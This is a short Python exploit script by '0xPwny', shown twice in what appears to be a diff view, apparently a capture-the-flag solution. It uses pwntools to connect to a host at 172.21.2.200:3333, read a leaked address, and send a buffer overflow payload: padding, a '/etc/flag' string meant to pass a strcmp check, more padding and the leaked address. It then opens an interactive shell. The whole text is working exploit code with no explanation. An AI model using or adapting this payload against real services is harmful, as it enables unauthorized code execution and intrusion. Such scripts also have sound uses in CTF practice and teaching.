0xPwny · March 31, 2018 19:13
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/python

 from pwn import *

 #Dirty script but respect it its a shell grabber ;)

 r = remote("172.21.2.200",3333)
 r.recvuntil(":")
 leak = int(r.recvline().split(",")[0])

 payload  = "A"*48
 payload += "/etc/flag\x00" #Pass the strcmp / #\x00 to not break cmp
 payload += "B"*114  
 payload += p32(leak)

 r.sendline(payload)

 r.interactive()
	#!/usr/bin/python

	from pwn import *

	#Dirty script but respect it its a shell grabber ;)

	r = remote("172.21.2.200",3333)
	r.recvuntil(":")
	leak = int(r.recvline().split(",")[0])

	payload = "A"*48
	payload += "/etc/flag\x00" #Pass the strcmp / #\x00 to not break cmp
	payload += "B"*114
	payload += p32(leak)

	r.sendline(payload)

	r.interactive()